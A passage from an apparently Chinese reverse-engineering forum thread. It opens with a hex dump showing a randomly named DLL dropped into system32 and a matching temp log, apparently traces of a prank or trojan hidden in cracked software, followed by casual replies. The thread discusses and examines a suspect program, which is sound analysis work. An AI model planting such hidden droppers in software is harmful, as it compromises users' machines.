000AF5A0  79 66 2E 64 31 6C 00 00 00 00 00 00 00 00 00 00  yf.d1l..........
000AF5B0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF5C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF5D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF5E0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF5F0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF600  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF610  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF620  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF630  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF640  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF650  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF660  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF670  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF680  00 00 00 00 00 00 00 00 43 3A 5C 57 49 4E 4E 54  ........C:\WINNT
000AF690  5C 73 79 73 74 65 6D 33 32 5C 59 69 65 6F 78 73  \system32\Yieoxs
000AF6A0  79 66 2E 64 6C 6C 00 00 00 00 00 00 00 00 00 00  yf.dll..........
000AF6B0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF6C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF6D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF6E0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF6F0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF700  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF710  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF720  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF730  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF740  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF750  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF760  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF770  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF780  00 00 00 00 00 00 00 00 43 3A 5C 44 4F 43 55 4D  ........C:\DOCUM
000AF790  45 7E 31 5C 67 61 74 65 73 5C 4C 4F 43 41 4C 53  E~1\gates\LOCALS
000AF7A0  7E 31 5C 54 65 6D 70 5C 59 69 65 6F 78 73 79 66  ~1\Temp\Yieoxsyf
000AF7B0  2E 6C 6F 67 00 00 00 00 00 00 00 00 00 00 00 00  .log............
000AF7C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF7D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF7E0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF7F0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF800  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF810  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF820  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF830  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF840  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF850  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF860  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF870  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF880  00 00 00 00 00 00 00 00                          ........
2006-12-22 11:31
0
雪    币: 146
活跃值: (33)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
48

以后别人破的软件,....那更是不能随便用了....
2006-12-22 12:34
0
雪    币: 200
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
49
看不懂,完全进来学习.
今天的收获是感冒轻一点了.
2006-12-22 17:11
0
雪    币: 255
活跃值: (207)
能力值: ( LV9,RANK:250 )
在线值:
发帖
回帖
粉丝
50
本来就是调侃的语句玩的恶作剧而已,这么深的回复也能给你们挖出来说事儿
2006-12-23 17:06
0
游客
登录 | 注册 方可回帖
返回
//